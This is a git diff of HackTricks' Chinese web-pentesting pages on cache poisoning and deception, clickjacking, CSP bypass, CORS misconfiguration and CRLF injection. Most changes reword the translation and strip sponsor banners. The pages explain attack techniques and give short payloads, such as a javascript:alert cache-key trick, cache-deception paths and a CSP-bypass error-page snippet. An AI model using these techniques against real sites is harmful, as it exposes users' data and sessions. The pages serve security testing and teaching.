-有一个关于此的portswigger实验室:[https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
+There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
 
 ### 参数伪装
 
-例如,在ruby服务器中,可以使用字符**`;`**而不是**`&`**来分隔**参数**。这可以用来将无键参数值放入有键参数中并进行滥用。
+例如,在 ruby 服务器中,可以使用字符 **`;`** 来分隔 **参数**,而不是 **`&`**。这可以用来将无键参数值放入有键参数中并进行滥用。
 
-Portswigger实验室:[https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
+Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
 
-### 通过滥用HTTP请求走私来利用HTTP缓存中毒
+### 通过滥用 HTTP 请求走私来利用 HTTP 缓存中毒
 
-在这里了解如何通过滥用[HTTP请求走私进行缓存中毒攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning)。
+在这里了解如何通过滥用 [HTTP 请求走私进行缓存中毒攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning)。
 
-### Web缓存中毒的自动化测试
+### Web 缓存中毒的自动化测试
 
-[Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner)可以用于自动测试Web缓存中毒。它支持多种不同的技术,并且高度可定制。
+[Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) 可用于自动测试 Web 缓存中毒。它支持多种不同的技术,并且高度可定制。
 
-示例用法:`wcvs -u example.com`
+示例用法: `wcvs -u example.com`
 
 ## 漏洞示例
 
 ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
 
-ATS在不剥离URL中的片段的情况下转发了片段,并仅使用主机、路径和查询生成缓存键(忽略片段)。因此,请求`/#/../?r=javascript:alert(1)`被发送到后端,作为`/#/../?r=javascript:alert(1)`,而缓存键中没有有效负载,只有主机、路径和查询。
+ATS 在 URL 中转发了片段而没有去掉它,并仅使用主机、路径和查询生成缓存键(忽略片段)。因此,请求 `/#/../?r=javascript:alert(1)` 被发送到后端为 `/#/../?r=javascript:alert(1)`,而缓存键中没有负载,只有主机、路径和查询。
 
 ### GitHub CP-DoS
 
-在content-type头中发送错误值触发了405缓存响应。缓存键包含cookie,因此只能攻击未授权用户。
+在内容类型头中发送错误值触发了 405 缓存响应。缓存键包含 cookie,因此只能攻击未认证用户。
 
 ### GitLab + GCP CP-DoS
 
-GitLab使用GCP存储桶来存储静态内容。**GCP存储桶**支持**头部`x-http-method-override`**。因此,可以发送头部`x-http-method-override: HEAD`并使缓存返回空响应体。它还可以支持`PURGE`方法。
+GitLab 使用 GCP 存储桶来存储静态内容。**GCP 存储桶** 支持 **头部 `x-http-method-override`**。因此,可以发送头部 `x-http-method-override: HEAD` 并使缓存返回空响应体。它还可以支持方法 `PURGE`。
 
-### Rack中间件(Ruby on Rails)
+### Rack 中间件 (Ruby on Rails)
 
-在Ruby on Rails应用程序中,通常使用Rack中间件。Rack代码的目的是获取**`x-forwarded-scheme`**头的值并将其设置为请求的方案。当发送头`x-forwarded-scheme: http`时,会发生301重定向到相同位置,可能导致该资源的拒绝服务(DoS)。此外,应用程序可能会识别`X-forwarded-host`头并将用户重定向到指定主机。这种行为可能导致从攻击者的服务器加载JavaScript文件,构成安全风险。
+在 Ruby on Rails 应用程序中,通常使用 Rack 中间件。Rack 代码的目的是获取 **`x-forwarded-scheme`** 头的值并将其设置为请求的方案。当发送头 `x-forwarded-scheme: http` 时,会发生 301 重定向到相同位置,可能导致该资源的拒绝服务 (DoS)。此外,应用程序可能会识别 `X-forwarded-host` 头并将用户重定向到指定主机。这种行为可能导致从攻击者的服务器加载 JavaScript 文件,构成安全风险。
 
-### 403和存储桶
+### 403 和存储桶
 
-Cloudflare之前缓存了403响应。尝试使用不正确的授权头访问S3或Azure存储Blob将导致403响应被缓存。尽管Cloudflare已停止缓存403响应,但这种行为可能仍然存在于其他代理服务中。
+Cloudflare 之前缓存了 403 响应。尝试使用错误的授权头访问 S3 或 Azure 存储 Blob 会导致 403 响应被缓存。尽管 Cloudflare 已停止缓存 403 响应,但这种行为可能仍然存在于其他代理服务中。
 
 ### 注入键参数
 
-缓存通常在缓存键中包含特定的GET参数。例如,Fastly的Varnish在请求中缓存了`size`参数。然而,如果还发送了一个带有错误值的参数的URL编码版本(例如,`siz%65`),缓存键将使用正确的`size`参数构建。然而,后端将处理URL编码参数中的值。对第二个`size`参数进行URL编码导致缓存省略它,但后端使用了它。将该参数的值设置为0导致可缓存的400错误请求。
+缓存通常在缓存键中包含特定的 GET 参数。例如,Fastly 的 Varnish 在请求中缓存了 `size` 参数。然而,如果发送了 URL 编码版本的参数(例如 `siz%65`)并且值错误,缓存键将使用正确的 `size` 参数构建。然而,后端将处理 URL 编码参数中的值。对第二个 `size` 参数进行 URL 编码导致缓存忽略它,但后端使用了它。将该参数的值设置为 0 会导致可缓存的 400 错误请求。
 
 ### 用户代理规则
 
-一些开发人员阻止与高流量工具(如FFUF或Nuclei)匹配的用户代理的请求,以管理服务器负载。讽刺的是,这种方法可能引入漏洞,例如缓存中毒和DoS。
+一些开发人员阻止与高流量工具(如 FFUF 或 Nuclei)匹配的用户代理的请求,以管理服务器负载。讽刺的是,这种方法可能引入漏洞,例如缓存中毒和 DoS。
 
 ### 非法头字段
 
-[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230)规定了头名称中可接受的字符。包含超出指定**tchar**范围的字符的头理想情况下应触发400错误请求响应。在实践中,服务器并不总是遵循此标准。一个显著的例子是Akamai,它转发包含无效字符的头,并缓存任何400错误,只要`cache-control`头不存在。发现了一种可利用的模式,发送带有非法字符(如`\`)的头将导致可缓存的400错误请求。
+[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) 指定了头名称中可接受的字符。包含超出指定 **tchar** 范围的字符的头理想情况下应触发 400 错误请求响应。在实践中,服务器并不总是遵循此标准。一个显著的例子是 Akamai,它转发包含无效字符的头,并缓存任何 400 错误,只要 `cache-control` 头不存在。发现了一种可利用的模式,发送包含非法字符(如 `\`)的头会导致可缓存的 400 错误请求。
 
 ### 查找新头
 
@@ -200,9 +192,9 @@ Cloudflare之前缓存了403响应。尝试使用不正确的授权头访问S3
 
 ## 缓存欺骗
 
-缓存欺骗的目标是使客户端**加载将被缓存保存的敏感信息的资源**。
+缓存欺骗的目标是使客户端 **加载将被缓存保存的敏感信息的资源**。
 
-首先要注意的是,**扩展名**如`.css`、`.js`、`.png`等通常被**配置**为**保存**在**缓存**中。因此,如果您访问`www.example.com/profile.php/nonexistent.js`,缓存可能会存储响应,因为它看到`.js`**扩展名**。但是,如果**应用程序**正在**重放**存储在_www.example.com/profile.php_中的**敏感**用户内容,您可以从其他用户那里**窃取**这些内容。
+首先要注意的是,**扩展名**如 `.css`、`.js`、`.png` 等通常被 **配置** 为 **保存** 在 **缓存** 中。因此,如果您访问 `www.example.com/profile.php/nonexistent.js`,缓存可能会存储响应,因为它看到 `.js` **扩展名**。但是,如果 **应用程序** 正在 **重放** 存储在 _www.example.com/profile.php_ 中的 **敏感** 用户内容,您可以 **窃取** 其他用户的这些内容。
 
 其他测试内容:
 
@@ -211,19 +203,19 @@ Cloudflare之前缓存了403响应。尝试使用不正确的授权头访问S3
 - _www.example.com/profile.php/test.js_
 - _www.example.com/profile.php/../test.js_
 - _www.example.com/profile.php/%2e%2e/test.js_
-- _使用不太常见的扩展名,如_`.avif`
+- _使用不太常见的扩展名,如_ `.avif`
 
-另一个非常清晰的例子可以在这篇文章中找到:[https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)。\
-在这个例子中,解释了如果您加载一个不存在的页面,如_http://www.example.com/home.php/non-existent.css_,将返回_http://www.example.com/home.php_(**带有用户的敏感信息**)的内容,并且缓存服务器将保存结果。\
-然后,**攻击者**可以在自己的浏览器中访问_http://www.example.com/home.php/non-existent.css_并观察之前访问过的用户的**机密信息**。
+另一个非常清晰的例子可以在这个写作中找到: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)。\
+在这个例子中,解释了如果您加载一个不存在的页面,如 _http://www.example.com/home.php/non-existent.css_,将返回 _http://www.example.com/home.php_ 的内容(**包含用户的敏感信息**),并且缓存服务器将保存结果。\
+然后,**攻击者** 可以在自己的浏览器中访问 _http://www.example.com/home.php/non-existent.css_ 并观察之前访问过的用户的 **机密信息**。
 
-请注意,**缓存代理**应被**配置**为根据文件的**扩展名**(_.css_)而不是根据内容类型来**缓存**文件。在示例_http://www.example.com/home.php/non-existent.css_中,将具有`text/html`内容类型,而不是`text/css` MIME类型(这是_.css_文件的预期)。
+请注意,**缓存代理** 应该被 **配置** 为 **缓存** 文件 **基于** 文件的 **扩展名**(_.css_),而不是基于内容类型。在示例 _http://www.example.com/home.php/non-existent.css_ 中,将具有 `text/html` 内容类型,而不是 `text/css` MIME 类型(这是 _.css_ 文件的预期类型)。
 
-在这里了解如何通过滥用HTTP请求走私进行[缓存欺骗攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)。
+在这里了解如何进行 [利用 HTTP 请求走私进行缓存欺骗攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)。
 
 ## 自动化工具
 
-- [**toxicache**](https://github.com/xhzeem/toxicache):Golang扫描器,用于在URL列表中查找Web缓存中毒漏洞并测试多种注入技术。
+- [**toxicache**](https://github.com/xhzeem/toxicache): Golang 扫描器,用于在 URL 列表中查找 Web 缓存中毒漏洞并测试多种注入技术。
 
 ## 参考文献
 
@@ -234,12 +226,5 @@ Cloudflare之前缓存了403响应。尝试使用不正确的授权头访问S3
 - [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
 - [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
 
-

-
-\
-使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception)轻松构建和**自动化工作流**,由世界上**最先进**的社区工具提供支持。\
-今天获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/clickjacking.md b/src/pentesting-web/clickjacking.md
index cfd5dbfb9..0a9c038ee 100644
--- a/src/pentesting-web/clickjacking.md
+++ b/src/pentesting-web/clickjacking.md
@@ -2,25 +2,17 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-今天就获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}
-
 ## 什么是 Clickjacking
 
-在 clickjacking 攻击中,**用户** 被 **欺骗** 点击网页上的一个 **元素**,该元素要么是 **不可见** 的,要么伪装成其他元素。这种操控可能导致用户意想不到的后果,例如下载恶意软件、重定向到恶意网页、提供凭据或敏感信息、资金转移或在线购买产品。
+在 clickjacking 攻击中,**用户**被**欺骗**去**点击**网页上的一个**元素**,该元素要么是**不可见**的,要么伪装成其他元素。这种操控可能导致用户意想不到的后果,例如下载恶意软件、重定向到恶意网页、提供凭据或敏感信息、资金转移或在线购买产品。
 
 ### 预填充表单技巧
 
-有时可以在加载页面时使用 GET 参数 **填充表单字段的值**。攻击者可能会利用这种行为用任意数据填充表单,并发送 clickjacking 有效载荷,以便用户按下提交按钮。
+有时可以在加载页面时使用 GET 参数**填充表单字段的值**。攻击者可能会利用这种行为用任意数据填充表单,并发送 clickjacking 有效载荷,以便用户点击提交按钮。
 
 ### 使用拖放填充表单
 
-如果您需要用户 **填写表单**,但不想直接要求他写一些特定的信息(例如您知道的电子邮件或特定密码),您可以只要求他 **拖放** 一些东西,这将写入您控制的数据,就像在 [**这个例子**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/) 中一样。
+如果您需要用户**填写表单**,但不想直接要求他写一些特定的信息(例如您知道的电子邮件或特定密码),您可以只要求他**拖放**一些东西,这样就会写入您控制的数据,如在[**这个例子**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/)中所示。
 
 ### 基本有效载荷
 ```markup
@@ -99,7 +91,7 @@ background: #F00;
 
 如果您已识别出一个 **需要用户点击** 某个元素以 **触发** XSS 的 **XSS 攻击**,并且该页面 **易受点击劫持**,您可以利用它来欺骗用户点击按钮/链接。\
 示例:\
-&#xNAN;_You 在某些账户的私人细节中发现了一个 **自我 XSS**(只有 **您可以设置和读取** 的细节)。包含设置这些细节的 **表单** 的页面 **易受** **点击劫持**,您可以用 GET 参数 **预填充** **表单**。\
+&#xNAN;_Y您在账户的某些私人细节中发现了一个 **自我 XSS**(只有您可以设置和读取的细节)。包含设置这些细节的 **表单** 的页面 **易受** **点击劫持**,您可以用 GET 参数 **预填充** **表单**。\
 \_\_攻击者可以准备一个 **点击劫持** 攻击,通过 **预填充** **表单** 以包含 **XSS 负载**,并 **欺骗** **用户** **提交** 表单。因此,**当表单被提交** 且值被修改时,**用户将执行 XSS**。
 
 ## 减轻点击劫持的策略
@@ -116,7 +108,7 @@ background: #F00;
 然而,这些框架破坏脚本可能会被规避:
 
 - **浏览器的安全设置:** 一些浏览器可能会根据其安全设置或缺乏 JavaScript 支持来阻止这些脚本。
-- **HTML5 iframe `sandbox` 属性:** 攻击者可以通过设置 `sandbox` 属性为 `allow-forms` 或 `allow-scripts` 值而不包含 `allow-top-navigation` 来中和框架破坏脚本。这防止了 iframe 验证它是否是顶部窗口,例如,
+- **HTML5 iframe `sandbox` 属性:** 攻击者可以通过设置 `sandbox` 属性为 `allow-forms` 或 `allow-scripts` 值而不包含 `allow-top-navigation` 来中和框架破坏脚本。这会阻止 iframe 验证它是否是顶部窗口,例如,
 ```html
  // The bot will load an URL with the payload
@@ -563,7 +548,7 @@ run()
 
 ### 通过限制CSP绕过CSP
 
-在[**这个CTF写作**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)中,CSP通过在允许的iframe内注入更严格的CSP来绕过,该CSP不允许加载特定的JS文件,然后通过**原型污染**或**DOM覆盖**允许**滥用不同的脚本来加载任意脚本**。
+在[**这个CTF写作**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)中,通过在允许的iframe内注入更严格的CSP来绕过CSP,该CSP不允许加载特定的JS文件,然后通过**原型污染**或**DOM覆盖**允许**滥用不同的脚本来加载任意脚本**。
 
 您可以使用**`csp`**属性**限制iframe的CSP**:
 ```html
@@ -600,7 +585,7 @@ document.querySelector("DIV").innerHTML =
 
 有趣的是,像Chrome和Firefox这样的浏览器在处理与CSP相关的iframes时表现不同,可能导致由于未定义行为而泄露敏感信息。
 
-另一种技术涉及利用CSP本身推断秘密子域。该方法依赖于二分搜索算法,并调整CSP以包含故意被阻止的特定域。例如,如果秘密子域由未知字符组成,可以通过修改CSP指令来阻止或允许这些子域,逐步测试不同的子域。以下是一个片段,展示了如何设置CSP以促进此方法:
+另一种技术涉及利用CSP本身推断秘密子域。该方法依赖于二分查找算法,并调整CSP以包含故意被阻止的特定域。例如,如果秘密子域由未知字符组成,可以通过修改CSP指令来阻止或允许这些子域,逐步测试不同的子域。以下是一个片段,展示了如何设置CSP以促进此方法:
 ```markdown
 img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
 ```
@@ -608,39 +593,24 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
 
 这两种方法利用了CSP在浏览器中的实现和行为的细微差别,展示了看似安全的策略如何无意中泄露敏感信息。
 
-Trick from [**here**](https://ctftime.org/writeup/29310).
+技巧来自[**这里**](https://ctftime.org/writeup/29310)。
 
-

+## 绕过CSP的危险技术
 
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
+### 参数过多时的PHP错误
 
-**Hacking Insights**\
-参与深入探讨黑客的刺激与挑战的内容
+根据[**这个视频中评论的最后一种技术**](https://www.youtube.com/watch?v=Sm4G6cAHjWM),发送过多参数(1001个GET参数,尽管你也可以使用POST参数和超过20个文件)。任何在PHP网页代码中定义的**`header()`**都**不会被发送**,因为这会触发错误。
 
-**Real-Time Hack News**\
-通过实时新闻和见解,跟上快速变化的黑客世界
+### PHP响应缓冲区溢出
 
-**Latest Announcements**\
-及时了解最新的漏洞赏金发布和重要平台更新
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并立即与顶级黑客合作!
-
-## Unsafe Technologies to Bypass CSP
-
-### PHP Errors when too many params
-
-根据 [**this video**](https://www.youtube.com/watch?v=Sm4G6cAHjWM) 中评论的**最后一种技术**,发送过多参数(1001个GET参数,尽管你也可以使用POST参数和超过20个文件)。任何在PHP网页代码中定义的 **`header()`** 都**不会被发送**,因为这将触发错误。
-
-### PHP response buffer overload
-
-PHP以默认方式**缓冲响应到4096**字节。因此,如果PHP显示警告,通过提供**足够的数据在警告中**,**响应**将**在** **CSP头**之前**发送**,导致头被忽略。\
+PHP默认情况下**将响应缓冲到4096**字节。因此,如果PHP显示警告,通过提供**足够的数据在警告中**,**响应**将在**CSP头**之前**发送**,导致头被忽略。\
 然后,这种技术基本上是**用警告填充响应缓冲区**,以便CSP头不被发送。
 
-Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
+想法来自[**这个写作**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points)。
 
-### Rewrite Error Page
+### 重写错误页面
 
-根据 [**this writeup**](https://blog.ssrf.kr/69),似乎可以通过加载一个错误页面(可能没有CSP)并重写其内容来绕过CSP保护。
+根据[**这个写作**](https://blog.ssrf.kr/69),似乎可以通过加载一个错误页面(可能没有CSP)并重写其内容来绕过CSP保护。
 ```javascript
 a = window.open("/" + "x".repeat(4100))
 setTimeout(function () {
@@ -649,7 +619,7 @@ a.document.body.innerHTML = `

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客见解**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-了解最新的漏洞赏金计划和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧!
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/cors-bypass.md b/src/pentesting-web/cors-bypass.md
index b1b5548e9..1380b7672 100644
--- a/src/pentesting-web/cors-bypass.md
+++ b/src/pentesting-web/cors-bypass.md
@@ -2,13 +2,9 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
-
 ## 什么是 CORS?
 
-跨源资源共享 (CORS) 标准 **使服务器能够定义谁可以访问其资产** 和 **哪些 HTTP 请求方法被允许** 来自外部来源。
+跨源资源共享 (CORS) 标准 **使服务器能够定义谁可以访问其资产** 和 **哪些 HTTP 请求方法被外部来源允许**。
 
 **同源** 策略要求 **请求** 资源的服务器和托管 **资源** 的服务器共享相同的协议(例如,`http://`)、域名(例如,`internal-web.com`)和 **端口**(例如,80)。在此策略下,仅允许来自同一域和端口的网页访问资源。
 
@@ -16,24 +12,24 @@
 
 | 访问的 URL                               | 是否允许访问?                       |
 | ----------------------------------------- | ------------------------------------- |
-| `http://normal-website.com/example/`      | 是:相同的协议、域名和端口           |
-| `http://normal-website.com/example2/`     | 是:相同的协议、域名和端口           |
-| `https://normal-website.com/example/`     | 否:不同的协议和端口                 |
-| `http://en.normal-website.com/example/`   | 否:不同的域名                       |
-| `http://www.normal-website.com/example/`  | 否:不同的域名                       |
+| `http://normal-website.com/example/`      | 是:相同的协议、域名和端口            |
+| `http://normal-website.com/example2/`     | 是:相同的协议、域名和端口            |
+| `https://normal-website.com/example/`     | 否:不同的协议和端口                  |
+| `http://en.normal-website.com/example/`   | 否:不同的域名                        |
+| `http://www.normal-website.com/example/`  | 否:不同的域名                        |
 | `http://normal-website.com:8080/example/` | 否:不同的端口\*                     |
 
 \*Internet Explorer 在执行同源策略时忽略端口号,因此允许此访问。
 
 ### `Access-Control-Allow-Origin` 头
 
-此头可以允许 **多个源**、**`null`** 值或通配符 **`*`**。然而,**没有浏览器支持多个源**,并且使用通配符 `*` 受到 **限制**。(通配符必须单独使用,且与 `Access-Control-Allow-Credentials: true` 一起使用是不允许的。)
+此头可以允许 **多个来源**、**`null`** 值或通配符 **`*`**。然而,**没有浏览器支持多个来源**,并且使用通配符 `*` 受到 **限制**。(通配符必须单独使用,且与 `Access-Control-Allow-Credentials: true` 一起使用是不允许的。)
 
 此头是 **由服务器发出** 的,以响应由网站发起的跨域资源请求,浏览器会自动添加 `Origin` 头。
 
 ### `Access-Control-Allow-Credentials` 头
 
-默认情况下,跨源请求是在没有凭据(如 cookies 或 Authorization 头)的情况下进行的。然而,跨域服务器可以通过将 `Access-Control-Allow-Credentials` 头设置为 **`true`** 来允许在发送凭据时读取响应。
+**默认情况下**,跨源请求是在没有凭据(如 cookies 或 Authorization 头)的情况下进行的。然而,跨域服务器可以通过将 `Access-Control-Allow-Credentials` 头设置为 **`true`** 来允许在发送凭据时读取响应。
 
 如果设置为 `true`,浏览器将传输凭据(cookies、授权头或 TLS 客户端证书)。
 ```javascript
@@ -66,9 +62,9 @@ xhr.send("Arun")
 
 ### 理解跨域通信中的预检请求
 
-在特定条件下发起跨域请求时,例如使用 **非标准 HTTP 方法**(除了 HEAD、GET、POST 以外),引入新的 **头部**,或使用特殊的 **Content-Type 头部值**,可能需要进行预检请求。这个初步请求利用 **`OPTIONS`** 方法,旨在通知服务器即将到来的跨源请求的意图,包括它打算使用的 HTTP 方法和头部。
+在特定条件下发起跨域请求时,例如使用 **非标准 HTTP 方法**(除了 HEAD、GET、POST 以外的任何方法)、引入新的 **头部**,或使用特殊的 **Content-Type 头部值**,可能需要进行预检请求。此初步请求利用 **`OPTIONS`** 方法,旨在通知服务器即将到来的跨源请求的意图,包括它打算使用的 HTTP 方法和头部。
 
-**跨源资源共享 (CORS)** 协议要求进行此预检检查,以通过验证允许的方法、头部和来源的可信度来确定请求的跨源操作的可行性。有关哪些条件可以绕过预检请求的详细理解,请参考 [**Mozilla 开发者网络 (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) 提供的综合指南。
+**跨源资源共享 (CORS)** 协议要求进行此预检检查,以通过验证允许的方法、头部和来源的可信度来确定请求的跨源操作的可行性。有关哪些条件可以绕过预检请求的详细理解,请参考 [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) 提供的综合指南。
 
 需要注意的是,**缺少预检请求并不意味着响应不需要携带授权头部**。没有这些头部,浏览器将无法处理来自跨源请求的响应。
 
@@ -81,7 +77,7 @@ Origin: https://example.com
 Access-Control-Request-Method: POST
 Access-Control-Request-Headers: Authorization
 ```
-作为响应,服务器可能会返回指示接受的方法、允许的来源和其他CORS政策细节的头部,如下所示:
+作为响应,服务器可能会返回指示接受的方法、允许的来源和其他CORS策略细节的头部,如下所示:
 ```markdown
 HTTP/1.1 204 No Content
 ...
@@ -93,7 +89,7 @@ Access-Control-Max-Age: 240
 ```
 - **`Access-Control-Allow-Headers`**: 此头部指定在实际请求中可以使用哪些头部。它由服务器设置,以指示来自客户端的请求中允许的头部。
 - **`Access-Control-Expose-Headers`**: 通过此头部,服务器通知客户端哪些头部可以作为响应的一部分被暴露,除了简单的响应头部。
-- **`Access-Control-Max-Age`**: 此头部指示预检请求的结果可以缓存多长时间。服务器设置预检请求返回的信息可以重用的最大时间(以秒为单位)。
+- **`Access-Control-Max-Age`**: 此头部指示预检请求的结果可以被缓存多长时间。服务器设置预检请求返回的信息可以重用的最大时间(以秒为单位)。
 - **`Access-Control-Request-Headers`**: 在预检请求中使用,此头部由客户端设置,以通知服务器客户端希望在实际请求中使用哪些HTTP头部。
 - **`Access-Control-Request-Method`**: 此头部也在预检请求中使用,由客户端设置,以指示在实际请求中将使用哪个HTTP方法。
 - **`Origin`**: 此头部由浏览器自动设置,指示跨源请求的来源。服务器使用它来评估是否应根据CORS策略允许或拒绝传入请求。
@@ -103,8 +99,8 @@ Access-Control-Max-Age: 240
 
 ### **本地网络请求预检请求**
 
-1. **`Access-Control-Request-Local-Network`**: 此头部包含在客户端的请求中,以表明该查询针对的是本地网络资源。它作为一个标记,通知服务器请求源自本地网络内。
-2. **`Access-Control-Allow-Local-Network`**: 作为响应,服务器利用此头部来传达请求的资源被允许与本地网络外的实体共享。它作为跨不同网络边界共享资源的绿灯,确保在维护安全协议的同时实现受控访问。
+1. **`Access-Control-Request-Local-Network`**: 此头部包含在客户端的请求中,以表明该请求是针对本地网络资源的。它作为一个标记,通知服务器请求源自本地网络内。
+2. **`Access-Control-Allow-Local-Network`**: 作为响应,服务器利用此头部来传达请求的资源被允许与本地网络外的实体共享。它作为跨越不同网络边界共享资源的绿灯,确保在维护安全协议的同时实现受控访问。
 
 一个**有效的响应允许本地网络请求**还需要在响应中包含头部 `Access-Controls-Allow-Local_network: true` :
 ```
@@ -118,9 +114,9 @@ Content-Length: 0
 ...
 ```
 > [!WARNING]
-> 请注意,linux **0.0.0.0** IP 可以用来 **绕过** 访问 localhost 的这些要求,因为该 IP 地址不被视为“本地”。
+> 请注意,linux **0.0.0.0** IP 可以用来 **绕过** 这些要求以访问 localhost,因为该 IP 地址不被视为“本地”。
 >
-> 如果您使用 **本地端点的公共 IP 地址**(例如路由器的公共 IP),也可以 **绕过本地网络要求**。因为在多种情况下,即使正在访问 **公共 IP**,如果是 **来自本地网络**,也会被允许访问。
+> 如果使用 **本地端点的公共 IP 地址**(例如路由器的公共 IP),也可以 **绕过本地网络要求**。因为在多种情况下,即使正在访问 **公共 IP**,如果是 **来自本地网络**,也会被允许访问。
 
 ### 通配符
 
@@ -133,15 +129,15 @@ Access-Control-Allow-Credentials: true
 
 ## 可利用的错误配置
 
-已观察到将 `Access-Control-Allow-Credentials` 设置为 **`true`** 是大多数 **真实攻击** 的前提条件。此设置允许浏览器发送凭据并读取响应,从而增强攻击的有效性。如果没有这个,利用用户的 cookies 变得不可行,从而降低了让浏览器发出请求而不是自己发出请求的好处。
+已观察到将 `Access-Control-Allow-Credentials` 设置为 **`true`** 是大多数 **真实攻击** 的前提条件。此设置允许浏览器发送凭据并读取响应,从而增强攻击的有效性。如果没有这个,利用浏览器发出请求的好处就会减少,因为利用用户的 cookies 变得不可行。
 
 ### 例外:利用网络位置作为身份验证
 
-存在一个例外情况,即受害者的网络位置作为一种身份验证形式。这允许受害者的浏览器作为代理,绕过基于 IP 的身份验证以访问内网应用程序。这种方法在影响上与 DNS 重新绑定相似,但更容易利用。
+存在一个例外情况,即受害者的网络位置作为身份验证的一种形式。这允许受害者的浏览器作为代理使用,绕过基于 IP 的身份验证以访问内网应用程序。这种方法在影响上与 DNS 重新绑定相似,但更容易利用。
 
 ### `Origin` 在 `Access-Control-Allow-Origin` 中的反射
 
-在现实场景中,`Origin` 头的值反射在 `Access-Control-Allow-Origin` 中在理论上是不太可能的,因为对组合这些头的限制。然而,寻求为多个 URL 启用 CORS 的开发人员可能会通过复制 `Origin` 头的值动态生成 `Access-Control-Allow-Origin` 头。这种方法可能引入漏洞,特别是当攻击者使用一个看似合法的域名时,从而欺骗验证逻辑。
+在现实场景中,`Origin` 头的值反射在 `Access-Control-Allow-Origin` 中在理论上是不太可能的,因为对这些头的组合有限制。然而,寻求为多个 URL 启用 CORS 的开发人员可能会通过复制 `Origin` 头的值动态生成 `Access-Control-Allow-Origin` 头。这种方法可能引入漏洞,特别是当攻击者使用一个看似合法的域名时,从而欺骗验证逻辑。
 ```html
 `
+- 在这个 URL 中,`%0d%0a%0d%0a` 是 CRLFCRLF 的 URL 编码形式。它欺骗服务器插入一个 CRLF 序列,使服务器将后续部分视为响应主体。
+4. 服务器在响应头中反映攻击者的输入,导致意外的响应结构,其中恶意脚本被浏览器解释为响应主体的一部分。
+
+#### HTTP 响应拆分导致重定向的示例
+
+来自 [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)
+
+浏览器到:
 ```
